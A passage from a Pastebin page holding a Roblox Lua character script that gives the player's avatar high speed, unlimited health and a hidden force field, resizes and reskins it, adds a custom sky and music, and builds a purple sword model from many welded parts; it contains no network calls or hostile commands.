Advertisement
spidercraft78

Untitled

Apr 8th, 2018
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 395.51 KB | None | 0 0
  1. local p = game.Players.spidercraft78Thug
  2. local char = p.Character
  3. local mouse = p:GetMouse()
  4. local larm = char["Left Arm"]
  5. local rarm = char["Right Arm"]
  6. local lleg = char["Left Leg"]
  7. local rleg = char["Right Leg"]
  8. local hed = char.Head
  9. local torso = char.Torso
  10. local hum = char.Humanoid
  11. local cam = game.Workspace.CurrentCamera
  12. local root = char.HumanoidRootPart
  13. local deb = false
  14. local shot = 0
  15. local l = game:GetService("Lighting")
  16. local rs = game:GetService("RunService").RenderStepped
  17. local debris=game:service"Debris"
  18. local stanceToggle = "Normal"
  19. math.randomseed(os.time())
  20. hum.WalkSpeed = 100
  21. char.Health:Destroy()
  22. hum.MaxHealth = math.huge
  23. wait(0.1)
  24. hum.Health = math.huge
  25. Instance.new("ForceField",char).Visible = false
  26. ----------------------------------------------------
  27. ypcall(function()
  28. char.Shirt:Destroy()
  29. char.Pants:Destroy()
  30. shirt = Instance.new("Shirt", char)
  31. shirt.Name = "Shirt"
  32. pants = Instance.new("Pants", char)
  33. pants.Name = "Pants"
  34. char.Shirt.ShirtTemplate = "http://www.roblox.com/asset/?id=131708604"
  35. char.Pants.PantsTemplate = "http://www.roblox.com/asset/?id=131708657"
  36. end)
  37. ----------------------------------------------------
  38. Debounces = {
  39. on = false;
  40. ks = false;
  41. CanAttack = true;
  42. CanJoke = true;
  43. NoIdl = false;
  44. Slashing = false;
  45. Slashed = false;
  46. Grabbing = false;
  47. Grabbed = false;
  48. }
  49. local Touche = {char.Name, }
  50. ----------------------------------------------------
  51. function lerp(a, b, t) -- Linear interpolation
  52. return a + (b - a)*t
  53. end
  54.  
  55. function slerp(a, b, t) --Spherical interpolation
  56. dot = a:Dot(b)
  57. if dot > 0.99999 or dot < -0.99999 then
  58. return t <= 0.5 and a or b
  59. else
  60. r = math.acos(dot)
  61. return (a*math.sin((1 - t)*r) + b*math.sin(t*r)) / math.sin(r)
  62. end
  63. end
  64.  
  65. function matrixInterpolate(a, b, t)
  66. local ax, ay, az, a00, a01, a02, a10, a11, a12, a20, a21, a22 = a:components()
  67. local bx, by, bz, b00, b01, b02, b10, b11, b12, b20, b21, b22 = b:components()
  68. local v0 = lerp(Vector3.new(ax, ay, az), Vector3.new(bx , by , bz), t) -- Position
  69. local v1 = slerp(Vector3.new(a00, a01, a02), Vector3.new(b00, b01, b02), t) -- Vector right
  70. local v2 = slerp(Vector3.new(a10, a11, a12), Vector3.new(b10, b11, b12), t) -- Vector up
  71. local v3 = slerp(Vector3.new(a20, a21, a22), Vector3.new(b20, b21, b22), t) -- Vector back
  72. local t = v1:Dot(v2)
  73. if not (t < 0 or t == 0 or t > 0) then -- Failsafe
  74. return CFrame.new()
  75. end
  76. return CFrame.new(
  77. v0.x, v0.y, v0.z,
  78. v1.x, v1.y, v1.z,
  79. v2.x, v2.y, v2.z,
  80. v3.x, v3.y, v3.z)
  81. end
  82. ----------------------------------------------------
  83. function genWeld(a,b)
  84. local w = Instance.new("Weld",a)
  85. w.Part0 = a
  86. w.Part1 = b
  87. return w
  88. end
  89. function weld(a, b)
  90. local weld = Instance.new("Weld")
  91. weld.Name = "W"
  92. weld.Part0 = a
  93. weld.Part1 = b
  94. weld.C0 = a.CFrame:inverse() * b.CFrame
  95. weld.Parent = a
  96. return weld;
  97. end
  98. ----------------------------------------------------
  99. function Lerp(c1,c2,al)
  100. local com1 = {c1.X,c1.Y,c1.Z,c1:toEulerAnglesXYZ()}
  101. local com2 = {c2.X,c2.Y,c2.Z,c2:toEulerAnglesXYZ()}
  102. for i,v in pairs(com1) do
  103. com1[i] = v+(com2[i]-v)*al
  104. end
  105. return CFrame.new(com1[1],com1[2],com1[3]) * CFrame.Angles(select(4,unpack(com1)))
  106. end
  107. ----------------------------------------------------
  108. newWeld = function(wp0, wp1, wc0x, wc0y, wc0z)
  109. local wld = Instance.new("Weld", wp1)
  110. wld.Part0 = wp0
  111. wld.Part1 = wp1
  112. wld.C0 = CFrame.new(wc0x, wc0y, wc0z)
  113. end
  114. ----------------------------------------------------
  115. function Tween(a,b,c)
  116. return a+(b-a)*c
  117. end
  118. ----------------------------------------------------
  119. function nwPrt(prnt,siz,cf,col)
  120. local prt=Instance.new("Part")
  121. prt.Parent=prnt
  122. prt.FormFactor=3
  123. prt.Name="Part"
  124. prt.Size=siz
  125. prt.CanCollide=false
  126. prt.Anchored=true
  127. prt.Locked=true
  128. prt.TopSurface=10
  129. prt.BottomSurface=10
  130. prt.FrontSurface=10
  131. prt.BackSurface=10
  132. prt.LeftSurface=10
  133. prt.RightSurface=10
  134. prt:BreakJoints()
  135. prt.CFrame=cf or CFrame.new(30,10,30)
  136. prt.Material="Neon"
  137. prt.BrickColor=BrickColor.new(col)
  138. m=Instance.new("SpecialMesh",prt)
  139. m.MeshType=6
  140. return prt
  141. end
  142. ----------------------------------------------------
  143. function nwSnd(prnt,pch,vol,id)
  144. local s=Instance.new("Sound",prnt)
  145. s.Pitch=pch
  146. s.Volume=vol
  147. s.SoundId="rbxassetid://"..id
  148. s.PlayOnRemove=true
  149. return s
  150. end
  151. ----------------------------------------------------
  152. function newRay(start,face,range,wat)
  153. local rey=Ray.new(start.p,(face.p-start.p).Unit*range)
  154. hit,pos=Workspace:FindPartOnRayWithIgnoreList(rey,wat)
  155. return rey,hit,pos
  156. end
  157. ----------------------------------------------------
  158. for i,v in pairs(char:children()) do
  159. if v:IsA("Hat") then
  160. v:Destroy()
  161. end
  162. end
  163. for i,v in pairs(hed:children()) do
  164. if v:IsA("Sound") then
  165. v:Destroy()
  166. end
  167. end
  168. ----------------------------------------------------
  169. function HasntTouched(plrname)
  170. local ret = true
  171. for _, v in pairs(Touche) do
  172. if v == plrname then
  173. ret = false
  174. end
  175. end
  176. return ret
  177. end
  178. ----------------------------------------------------
  179. larm.Size = larm.Size * 2
  180. rarm.Size = rarm.Size * 2
  181. lleg.Size = lleg.Size * 2
  182. rleg.Size = rleg.Size * 2
  183. torso.Size = torso.Size * 2
  184. hed.Size = hed.Size * 2
  185. root.Size = root.Size * 2
  186. ----------------------------------------------------
  187. newWeld(torso, larm, -1.5, 0.5, 0)
  188. larm.Weld.C1 = CFrame.new(0, 0.5, 0)
  189. newWeld(torso, rarm, 1.5, 0.5, 0)
  190. rarm.Weld.C1 = CFrame.new(0, 0.5, 0)
  191. newWeld(torso, hed, 0, 1.5, 0)
  192. newWeld(torso, lleg, -0.5, -1, 0)
  193. lleg.Weld.C1 = CFrame.new(0, 1, 0)
  194. newWeld(torso, rleg, 0.5, -1, 0)
  195. rleg.Weld.C1 = CFrame.new(0, 1, 0)
  196. newWeld(root, torso, 0, -1, 0)
  197. torso.Weld.C1 = CFrame.new(0, -1, 0)
  198. ----------------------------------------------------
  199. hed.face.Texture = "rbxassetid://629947734"
  200. z=Instance.new('Decal',hed)
  201. z.Face = 'Front'
  202. z.Texture='rbxassetid://99174105'
  203. z1=Instance.new('Decal',hed)
  204. z1.Face = 'Right'
  205. hed.BrickColor = BrickColor.new("Really black")
  206. lite = Instance.new("PointLight", torso)
  207. lite.Brightness = 14
  208. lite.Range = 10
  209. lite.Color = Color3.new(170, 0, 255)
  210. --[[local hed2 = hed:Clone()
  211. hed2.CanCollide = false
  212. hed2.Parent = char
  213. hed2:ClearAllChildren()
  214. hed2.Transparency = 1
  215. hed2.Name = "DARP"
  216. local w = Instance.new("Weld",hed2)
  217. w.Part0 = hed
  218. w.Part1 = hed2
  219. w.C0 = CFrame.new(0,0,-0.175)
  220. z=Instance.new("SurfaceGui",hed2)
  221. z.Enabled = true
  222. z.Face = "Front"
  223. z.Adornee = hed2
  224. z.CanvasSize = Vector2.new(100,100)
  225. local face = Instance.new("ImageLabel",z)
  226. face.Size = UDim2.new(1,-30,1,0)
  227. face.Position = UDim2.new(0,15,0,0)
  228. face.BackgroundTransparency = 1
  229. face.Image='rbxassetid://46282671']]--
  230. ----------------------------------------------------
  231. z = Instance.new("Sound", char)
  232. z.SoundId = "rbxassetid://301636384"--301636384
  233. z.Looped = true
  234. z.Pitch = .6
  235. z.Volume = 1
  236. wait(.01)
  237. z:Play()
  238. ----------------------------------------------------
  239. local l = game.Lighting
  240. local sky = Instance.new("Sky",l)
  241. sky.CelestialBodiesShown = true
  242. sky.SkyboxBk = "http://www.roblox.com/asset/?id=159454299"
  243. sky.SkyboxDn = "http://www.roblox.com/asset/?id=159454296"
  244. sky.SkyboxFt = "http://www.roblox.com/asset/?id=159454293"
  245. sky.SkyboxLf = "http://www.roblox.com/asset/?id=159454286"
  246. sky.SkyboxRt = "http://www.roblox.com/asset/?id=159454300"
  247. sky.SkyboxUp = "http://www.roblox.com/asset/?id=159454288"
  248. sky.StarCount = 100
  249. sky.Name = "N3xul Sky"
  250. ----------------------------------------------------
  251. local m = Instance.new("Model")
  252. m.Name = "Absolution"
  253. p1 = Instance.new("Part", m)
  254. p1.BrickColor = BrickColor.new("Royal purple")
  255. p1.Material = "Neon"
  256. p1.FormFactor = Enum.FormFactor.Custom
  257. p1.Size = Vector3.new(1, 0.600000024, 1.5)
  258. p1.CFrame = CFrame.new(67.4994888, 12.1560526, 73.0205841, 0.999972522, -3.59117985e-005, -8.00192356e-006, -1.39250187e-005, 0.358383715, -0.933530986, 5.28097153e-005, 0.933500648, 0.358406395)
  259. p1.CanCollide = false
  260. p1.Locked = true
  261. p1.Elasticity = 0
  262. p1.BottomSurface = Enum.SurfaceType.Smooth
  263. p1.TopSurface = Enum.SurfaceType.Smooth
  264. b1 = Instance.new("SpecialMesh", p1)
  265. b1.MeshType = Enum.MeshType.Wedge
  266. b1.Name = "Mesh"
  267. b1.Scale = Vector3.new(0.400000006, 0.600000024, 0.699999928)
  268. p2 = Instance.new("Part", m)
  269. p2.BrickColor = BrickColor.new("Really black")
  270. p2.FormFactor = Enum.FormFactor.Custom
  271. p2.Size = Vector3.new(1, 2.9000001, 1)
  272. p2.CFrame = CFrame.new(67.4995728, 11.7633543, 74.2129135, -1.30959779e-005, 2.79811252e-006, 0.999972522, 0.961226642, 0.275612593, -7.50799518e-006, -0.275637805, 0.96119839, 1.01176247e-005)
  273. p2.CanCollide = false
  274. p2.Locked = true
  275. p2.Elasticity = 0
  276. p2.BottomSurface = Enum.SurfaceType.Smooth
  277. p2.TopSurface = Enum.SurfaceType.Smooth
  278. b2 = Instance.new("BlockMesh", p2)
  279. b2.Name = "Mesh"
  280. b2.Scale = Vector3.new(0.400000006, 1, 0.400000006)
  281. p3 = Instance.new("Part", m)
  282. p3.BrickColor = BrickColor.new("Royal purple")
  283. p3.Material = "Neon"
  284. p3.FormFactor = Enum.FormFactor.Custom
  285. p3.Size = Vector3.new(1, 1.20000005, 2.0999999)
  286. p3.CFrame = CFrame.new(67.4994965, 12.6401453, 73.9670334, 0.999972522, -3.52207899e-005, -8.10639358e-006, -1.61500211e-005, 0.309035271, -0.951007903, 5.24176576e-005, 0.950978875, 0.309059501)
  287. p3.CanCollide = false
  288. p3.Locked = true
  289. p3.Elasticity = 0
  290. p3.BottomSurface = Enum.SurfaceType.Smooth
  291. p3.TopSurface = Enum.SurfaceType.Smooth
  292. b3 = Instance.new("SpecialMesh", p3)
  293. b3.MeshType = Enum.MeshType.Wedge
  294. b3.Name = "Mesh"
  295. b3.Scale = Vector3.new(0.400000006, 0.600000024, 0.699999928)
  296. p4 = Instance.new("Part", m)
  297. p4.BrickColor = BrickColor.new("Royal purple")
  298. p4.Material = "Neon"
  299. p4.FormFactor = Enum.FormFactor.Custom
  300. p4.Size = Vector3.new(1, 1.43999994, 2.05000019)
  301. p4.CFrame = CFrame.new(67.4995575, 11.8683414, 76.1565704, 0.999972522, -2.5085672e-005, -1.53700166e-005, -4.86194367e-005, -0.800831437, -0.598821938, 1.9131101e-005, 0.598835468, -0.800796151)
  302. p4.CanCollide = false
  303. p4.Locked = true
  304. p4.Elasticity = 0
  305. p4.BottomSurface = Enum.SurfaceType.Smooth
  306. p4.TopSurface = Enum.SurfaceType.Smooth
  307. b4 = Instance.new("SpecialMesh", p4)
  308. b4.MeshType = Enum.MeshType.Wedge
  309. b4.Name = "Mesh"
  310. b4.Scale = Vector3.new(0.300000012, 0.600000024, 0.699999988)
  311. p5 = Instance.new("Part", m)
  312. p5.BrickColor = BrickColor.new("Royal purple")
  313. p5.Material = "Neon"
  314. p5.FormFactor = Enum.FormFactor.Custom
  315. p5.Size = Vector3.new(1, 1.20000005, 3.20000005)
  316. p5.CFrame = CFrame.new(67.4995193, 13.241991, 74.8357468, 0.999972522, -3.59118021e-005, -8.00191992e-006, -1.39250224e-005, 0.358383656, -0.933530807, 5.2809708e-005, 0.933500469, 0.358406246)
  317. p5.CanCollide = false
  318. p5.Locked = true
  319. p5.Elasticity = 0
  320. p5.BottomSurface = Enum.SurfaceType.Smooth
  321. p5.TopSurface = Enum.SurfaceType.Smooth
  322. b5 = Instance.new("SpecialMesh", p5)
  323. b5.MeshType = Enum.MeshType.Wedge
  324. b5.Name = "Mesh"
  325. b5.Scale = Vector3.new(0.400000006, 0.600000024, 0.699999928)
  326. p6 = Instance.new("Part", m)
  327. p6.Name = "Handle"
  328. p6.BrickColor = BrickColor.new("Really black")
  329. p6.FormFactor = Enum.FormFactor.Custom
  330. p6.Size = Vector3.new(1.5999999, 13.6000004, 1)
  331. p6.CFrame = CFrame.new(67.5017471, 11.2780685, 66.1421967, -1.18190947e-005, 6.28741009e-006, 0.999972522, 0.99995929, -1.39772892e-005, -7.50630716e-006, -1.79708004e-005, 0.999939024, 1.01296728e-005)
  332. p6.CanCollide = false
  333. p6.Locked = true
  334. p6.Elasticity = 0
  335. p6.BottomSurface = Enum.SurfaceType.Smooth
  336. p6.TopSurface = Enum.SurfaceType.Smooth
  337. b6 = Instance.new("BlockMesh", p6)
  338. b6.Name = "Mesh"
  339. b6.Scale = Vector3.new(0.400000006, 1, 0.400000006)
  340. p7 = Instance.new("Part", m)
  341. p7.BrickColor = BrickColor.new("Royal purple")
  342. p7.Material = "Neon"
  343. p7.FormFactor = Enum.FormFactor.Custom
  344. p7.Size = Vector3.new(1, 1.00999999, 1.05000019)
  345. p7.CFrame = CFrame.new(67.5174179, 10.5228004, 76.3114471, 0.999972522, -2.76626724e-005, -6.72184569e-006, -4.7347472e-005, -0.91489929, -0.403581172, 2.14323372e-005, 0.403602213, -0.914867818)
  346. p7.CanCollide = false
  347. p7.Locked = true
  348. p7.Elasticity = 0
  349. p7.BottomSurface = Enum.SurfaceType.Smooth
  350. p7.TopSurface = Enum.SurfaceType.Smooth
  351. b7 = Instance.new("SpecialMesh", p7)
  352. b7.MeshType = Enum.MeshType.Wedge
  353. b7.Name = "Mesh"
  354. b7.Scale = Vector3.new(0.300000012, 0.600000024, 0.699999988)
  355. p8 = Instance.new("Part", m)
  356. p8.BrickColor = BrickColor.new("Royal purple")
  357. p8.Material = "Neon"
  358. p8.FormFactor = Enum.FormFactor.Custom
  359. p8.Size = Vector3.new(1, 1.00999999, 1.05000019)
  360. p8.CFrame = CFrame.new(67.5074387, 8.51285458, 76.8714371, 0.999972522, -2.76626724e-005, -6.72184387e-006, -4.73474684e-005, -0.91489917, -0.403581113, 2.14323354e-005, 0.403602153, -0.914867699)
  361. p8.CanCollide = false
  362. p8.Locked = true
  363. p8.Elasticity = 0
  364. p8.BottomSurface = Enum.SurfaceType.Smooth
  365. p8.TopSurface = Enum.SurfaceType.Smooth
  366. b8 = Instance.new("SpecialMesh", p8)
  367. b8.MeshType = Enum.MeshType.Wedge
  368. b8.Name = "Mesh"
  369. b8.Scale = Vector3.new(0.300000012, 0.600000024, 0.699999988)
  370. p9 = Instance.new("Part", m)
  371. p9.BrickColor = BrickColor.new("Really black")
  372. p9.FormFactor = Enum.FormFactor.Custom
  373. p9.Size = Vector3.new(1, 1.07999957, 1)
  374. p9.CFrame = CFrame.new(67.5095749, 7.1092, 74.5051422, -2.60536999e-005, -5.21559741e-006, 0.999972522, 0.35323599, -0.935490847, -1.50012565e-005, 0.935460567, 0.353258699, 4.2632455e-005)
  375. p9.CanCollide = false
  376. p9.Locked = true
  377. p9.Elasticity = 0
  378. p9.BottomSurface = Enum.SurfaceType.Smooth
  379. p9.TopSurface = Enum.SurfaceType.Smooth
  380. b9 = Instance.new("BlockMesh", p9)
  381. b9.Name = "Mesh"
  382. b9.Scale = Vector3.new(0.550000012, 1, 0.550000012)
  383. p10 = Instance.new("Part", m)
  384. p10.BrickColor = BrickColor.new("Really black")
  385. p10.FormFactor = Enum.FormFactor.Custom
  386. p10.Size = Vector3.new(1, 1.41999948, 1)
  387. p10.CFrame = CFrame.new(67.489624, 8.67401791, 72.7929764, -9.47785156e-006, -9.42233055e-006, 0.999972522, 0.292371064, 0.956263304, -7.54374832e-006, -0.956253231, 0.292334616, 1.01081387e-005)
  388. p10.CanCollide = false
  389. p10.Locked = true
  390. p10.Elasticity = 0
  391. p10.BottomSurface = Enum.SurfaceType.Smooth
  392. p10.TopSurface = Enum.SurfaceType.Smooth
  393. b10 = Instance.new("BlockMesh", p10)
  394. b10.Name = "Mesh"
  395. b10.Scale = Vector3.new(0.400000006, 1, 0.400000006)
  396. p11 = Instance.new("Part", m)
  397. p11.BrickColor = BrickColor.new("Really black")
  398. p11.FormFactor = Enum.FormFactor.Custom
  399. p11.Size = Vector3.new(1, 1.50999951, 1)
  400. p11.CFrame = CFrame.new(67.509552, 7.11887455, 70.3475952, -1.87569385e-005, 1.80455972e-005, 0.999972522, -0.36222899, -0.932047009, -9.30004444e-006, 0.932039678, -0.362191886, 4.04359016e-005)
  401. p11.CanCollide = false
  402. p11.Locked = true
  403. p11.Elasticity = 0
  404. p11.BottomSurface = Enum.SurfaceType.Smooth
  405. p11.TopSurface = Enum.SurfaceType.Smooth
  406. b11 = Instance.new("BlockMesh", p11)
  407. b11.Name = "Mesh"
  408. b11.Scale = Vector3.new(0.550000012, 1, 0.550000012)
  409. p12 = Instance.new("Part", m)
  410. p12.Name = "BladeCenter"
  411. p12.BrickColor = BrickColor.new("Royal purple")
  412. p12.Material = Enum.Material.Neon
  413. p12.FormFactor = Enum.FormFactor.Symmetric
  414. p12.Size = Vector3.new(1, 2, 2)
  415. p12.CFrame = CFrame.new(67.4995346, 6.83217764, 72.2514038, -0.999972522, 2.42275873e-005, 0.000103325896, -8.39982677e-005, 4.44650614e-005, -0.999960959, -4.06451727e-005, -0.999940753, -1.25430051e-005)
  416. p12.CanCollide = false
  417. p12.Locked = true
  418. p12.BottomSurface = Enum.SurfaceType.Smooth
  419. p12.TopSurface = Enum.SurfaceType.Smooth
  420. b12 = Instance.new("SpecialMesh", p12)
  421. b12.MeshType = Enum.MeshType.Brick
  422. b12.Name = "Mesh"
  423. b12.Scale = Vector3.new(0.499999911, 1, 0.699999928)
  424. p13 = Instance.new("Part", m)
  425. p13.BrickColor = BrickColor.new("Really black")
  426. p13.FormFactor = Enum.FormFactor.Custom
  427. p13.Size = Vector3.new(2.91000009, 4.3300004, 1)
  428. p13.CFrame = CFrame.new(67.5096359, 9.31026554, 73.9751816, 7.60371313e-006, 1.0943455e-005, 0.999972522, -0.119072244, -0.99284631, -7.55448127e-006, 0.992830038, -0.119038157, 1.01703836e-005)
  429. p13.CanCollide = false
  430. p13.Locked = true
  431. p13.Elasticity = 0
  432. p13.BottomSurface = Enum.SurfaceType.Smooth
  433. p13.TopSurface = Enum.SurfaceType.Smooth
  434. b13 = Instance.new("BlockMesh", p13)
  435. b13.Name = "Mesh"
  436. b13.Scale = Vector3.new(1, 1, 0.400000006)
  437. p14 = Instance.new("Part", m)
  438. p14.BrickColor = BrickColor.new("Really black")
  439. p14.FormFactor = Enum.FormFactor.Custom
  440. p14.Size = Vector3.new(2.5, 2.17999935, 1)
  441. p14.CFrame = CFrame.new(67.4896011, 10.1621294, 72.6420059, -1.55498967e-007, -1.33476442e-005, 0.999972522, -0.462319613, 0.886669755, -7.56198779e-006, -0.886637092, -0.462338567, 1.01078904e-005)
  442. p14.CanCollide = false
  443. p14.Locked = true
  444. p14.Elasticity = 0
  445. p14.BottomSurface = Enum.SurfaceType.Smooth
  446. p14.TopSurface = Enum.SurfaceType.Smooth
  447. b14 = Instance.new("BlockMesh", p14)
  448. b14.Name = "Mesh"
  449. b14.Scale = Vector3.new(0.400000006, 1, 0.400000006)
  450. p15 = Instance.new("Part", m)
  451. p15.BrickColor = BrickColor.new("Really black")
  452. p15.FormFactor = Enum.FormFactor.Custom
  453. p15.Size = Vector3.new(1.16999996, 4.2699995, 1)
  454. p15.CFrame = CFrame.new(67.5095901, 9.35303593, 70.6884613, -1.24399676e-005, -4.94209144e-006, 0.999972522, 0.645082474, 0.764063478, -7.52419282e-006, -0.764068604, 0.645045042, 1.0099785e-005)
  455. p15.CanCollide = false
  456. p15.Locked = true
  457. p15.Elasticity = 0
  458. p15.BottomSurface = Enum.SurfaceType.Smooth
  459. p15.TopSurface = Enum.SurfaceType.Smooth
  460. b15 = Instance.new("BlockMesh", p15)
  461. b15.Name = "Mesh"
  462. b15.Scale = Vector3.new(1, 1, 0.400000006)
  463. p16 = Instance.new("Part", m)
  464. p16.BrickColor = BrickColor.new("Really black")
  465. p16.FormFactor = Enum.FormFactor.Custom
  466. p16.Size = Vector3.new(1.68999994, 4.76000023, 1)
  467. p16.CFrame = CFrame.new(67.4996033, 9.63990211, 75.3800278, 2.98175655e-006, 1.30014914e-005, 0.999972522, 0.258795738, -0.965893507, -7.53869244e-006, 0.965865672, 0.258821338, 1.01718706e-005)
  468. p16.CanCollide = false
  469. p16.Locked = true
  470. p16.Elasticity = 0
  471. p16.BottomSurface = Enum.SurfaceType.Smooth
  472. p16.TopSurface = Enum.SurfaceType.Smooth
  473. b16 = Instance.new("BlockMesh", p16)
  474. b16.Name = "Mesh"
  475. b16.Scale = Vector3.new(1, 1, 0.400000006)
  476. p17 = Instance.new("Part", m)
  477. p17.BrickColor = BrickColor.new("Really black")
  478. p17.FormFactor = Enum.FormFactor.Custom
  479. p17.Size = Vector3.new(1.78999996, 4.21999979, 1)
  480. p17.CFrame = CFrame.new(67.499588, 9.28996372, 69.8789978, -9.50601952e-006, -9.41252802e-006, 0.999972522, 0.293352425, 0.955965877, -7.53842551e-006, -0.955955863, 0.293315947, 1.00904235e-005)
  481. p17.CanCollide = false
  482. p17.Locked = true
  483. p17.Elasticity = 0
  484. p17.BottomSurface = Enum.SurfaceType.Smooth
  485. p17.TopSurface = Enum.SurfaceType.Smooth
  486. b17 = Instance.new("BlockMesh", p17)
  487. b17.Name = "Mesh"
  488. b17.Scale = Vector3.new(1, 1, 0.400000006)
  489. p18 = Instance.new("WedgePart", m)
  490. p18.BrickColor = BrickColor.new("Royal purple")
  491. p18.Name = "BladePart1"
  492. p18.Material = Enum.Material.Neon
  493. p18.Name = "Wedge"
  494. p18.FormFactor = Enum.FormFactor.Symmetric
  495. p18.Size = Vector3.new(1, 4, 2)
  496. p18.CFrame = CFrame.new(67.499321, 6.83199787, 69.4816895, 0.999972522, -3.68033288e-005, -4.22928351e-005, 2.29664256e-005, -1.65102574e-005, 0.999963701, -2.03872096e-005, -0.999943435, -4.84290831e-005)
  497. p18.CanCollide = false
  498. p18.Locked = true
  499. p18.BottomSurface = Enum.SurfaceType.Smooth
  500. p18.TopSurface = Enum.SurfaceType.Smooth
  501. b18 = Instance.new("SpecialMesh", p18)
  502. b18.MeshType = Enum.MeshType.Wedge
  503. b18.Name = "Mesh"
  504. b18.Scale = Vector3.new(0.499999911, 0.899999976, 0.699999928)
  505. p19 = Instance.new("WedgePart", m)
  506. p19.BrickColor = BrickColor.new("Royal purple")
  507. p19.Name = "BladePart2"
  508. p19.Material = Enum.Material.Neon
  509. p19.Name = "Wedge"
  510. p19.FormFactor = Enum.FormFactor.Symmetric
  511. p19.Size = Vector3.new(1, 4, 2)
  512. p19.CFrame = CFrame.new(67.4994736, 6.83213568, 75.0314102, -0.999972522, 3.68059118e-005, -0.000103325001, -8.40002976e-005, -4.4521752e-005, 0.999963701, 2.03864402e-005, 0.999943435, 1.26029336e-005)
  513. p19.CanCollide = false
  514. p19.Locked = true
  515. p19.BottomSurface = Enum.SurfaceType.Smooth
  516. p19.TopSurface = Enum.SurfaceType.Smooth
  517. b19 = Instance.new("SpecialMesh", p19)
  518. b19.MeshType = Enum.MeshType.Wedge
  519. b19.Name = "Mesh"
  520. b19.Scale = Vector3.new(0.499999911, 0.899999976, 0.699999928)
  521. p20 = Instance.new("Part", m)
  522. p20.BrickColor = BrickColor.new("Really black")
  523. p20.FormFactor = Enum.FormFactor.Custom
  524. p20.Size = Vector3.new(2.53000021, 2.39999938, 1)
  525. p20.CFrame = CFrame.new(67.4996414, 7.91898966, 71.4148178, -1.09432585e-005, 7.6432425e-006, 0.999972522, 0.992849231, -0.119072601, -7.55000656e-006, 0.119038492, 0.992832959, 1.01311334e-005)
  526. p20.CanCollide = false
  527. p20.Locked = true
  528. p20.Elasticity = 0
  529. p20.BottomSurface = Enum.SurfaceType.Smooth
  530. p20.TopSurface = Enum.SurfaceType.Smooth
  531. b20 = Instance.new("BlockMesh", p20)
  532. b20.Name = "Mesh"
  533. b20.Scale = Vector3.new(0.400000006, 1, 0.400000006)
  534. p21 = Instance.new("Part", m)
  535. p21.BrickColor = BrickColor.new("Royal purple")
  536. p21.Material = "Neon"
  537. p21.FormFactor = Enum.FormFactor.Custom
  538. p21.Size = Vector3.new(1, 1.43999994, 1.59000015)
  539. p21.CFrame = CFrame.new(67.509613, 9.57073689, 76.6228256, 0.999972522, -2.50856156e-005, -1.53699839e-005, -4.86196222e-005, -0.800835371, -0.598824739, 1.91311228e-005, 0.59883821, -0.800800025)
  540. p21.CanCollide = false
  541. p21.Locked = true
  542. p21.Elasticity = 0
  543. p21.BottomSurface = Enum.SurfaceType.Smooth
  544. p21.TopSurface = Enum.SurfaceType.Smooth
  545. b21 = Instance.new("SpecialMesh", p21)
  546. b21.MeshType = Enum.MeshType.Wedge
  547. b21.Name = "Mesh"
  548. b21.Scale = Vector3.new(0.300000012, 0.600000024, 0.699999988)
  549. w1 = Instance.new("Weld", p1)
  550. w1.Name = "Part_Weld"
  551. w1.Part0 = p1
  552. w1.C0 = CFrame.new(-67.5030899, -72.5280457, -14.8209743, 1, -6.37466928e-006, 4.26825172e-005, -3.75621021e-005, 0.358411252, 0.933563769, -2.12490559e-005, -0.933563769, 0.358411252)
  553. w1.Part1 = p2
  554. w1.C1 = CFrame.new(9.14727688, -74.5847855, -67.5001221, -4.37113883e-008, 0.961261749, -0.27563718, 0, 0.27563718, 0.961261749, 1, 4.20180868e-008, -1.2048484e-008)
  555. w2 = Instance.new("Weld", p2)
  556. w2.Name = "Part_Weld"
  557. w2.Part0 = p2
  558. w2.C0 = CFrame.new(9.14727688, -74.5847855, -67.5001221, -4.37113883e-008, 0.961261749, -0.27563718, 0, 0.27563718, 0.961261749, 1, 4.20180868e-008, -1.2048484e-008)
  559. w2.Part1 = p3
  560. w2.C1 = CFrame.new(-67.5030823, -74.2541809, -10.8368053, 1, -8.59976626e-006, 4.22903977e-005, -3.75621021e-005, 0.30906105, 0.951042175, -2.12490559e-005, -0.951042175, 0.30906105)
  561. w3 = Instance.new("Weld", p3)
  562. w3.Name = "Part_Weld"
  563. w3.Part0 = p3
  564. w3.C0 = CFrame.new(-67.5030823, -74.2541809, -10.8368053, 1, -8.59976626e-006, 4.22903977e-005, -3.75621021e-005, 0.30906105, 0.951042175, -2.12490559e-005, -0.951042175, 0.30906105)
  565. w3.Part1 = p4
  566. w3.C1 = CFrame.new(-67.5002975, -36.1002579, 68.1035233, 1, -4.10709617e-005, 9.00123541e-006, -3.82823673e-005, -0.800855637, 0.598857403, -1.73869594e-005, -0.598857403, -0.800855637)
  567. w4 = Instance.new("Weld", p4)
  568. w4.Name = "Part_Weld"
  569. w4.Part0 = p4
  570. w4.C0 = CFrame.new(-67.5002975, -36.1002579, 68.1035233, 1, -4.10709617e-005, 9.00123541e-006, -3.82823673e-005, -0.800855637, 0.598857403, -1.73869594e-005, -0.598857403, -0.800855637)
  571. w4.Part1 = p5
  572. w4.C1 = CFrame.new(-67.5031891, -74.611969, -14.457736, 1, -6.37466928e-006, 4.26825172e-005, -3.75621021e-005, 0.358411252, 0.933563769, -2.12490559e-005, -0.933563769, 0.358411252)
  573. w5 = Instance.new("Weld", p5)
  574. w5.Name = "Part_Weld"
  575. w5.Part0 = p5
  576. w5.C0 = CFrame.new(-67.5031891, -74.611969, -14.457736, 1, -6.37466928e-006, 4.26825172e-005, -3.75621021e-005, 0.358411252, 0.933563769, -2.12490559e-005, -0.933563769, 0.358411252)
  577. w5.Part1 = p6
  578. w5.C1 = CFrame.new(-11.2799978, -66.1456223, -67.5023346, -4.37113883e-008, 1, 4.37113883e-008, 0, -4.37113883e-008, 1, 1, 4.37113883e-008, 1.91068547e-015)
  579. w6 = Instance.new("Weld", p6)
  580. w6.Name = "Part_Weld"
  581. w6.Part0 = p6
  582. w6.C0 = CFrame.new(-11.2799978, -66.1456223, -67.5023346, -4.37113883e-008, 1, 4.37113883e-008, 0, -4.37113883e-008, 1, 1, 4.37113883e-008, 1.91068547e-015)
  583. w6.Part1 = p7
  584. w6.C1 = CFrame.new(-67.5183792, -21.1694489, 74.0717163, 1, -3.97989206e-005, 1.13026372e-005, -4.09751265e-005, -0.91493088, 0.403610349, -5.72212457e-006, -0.403610349, -0.91493088)
  585. w7 = Instance.new("Weld", p7)
  586. w7.Name = "Part_Weld"
  587. w7.Part0 = p7
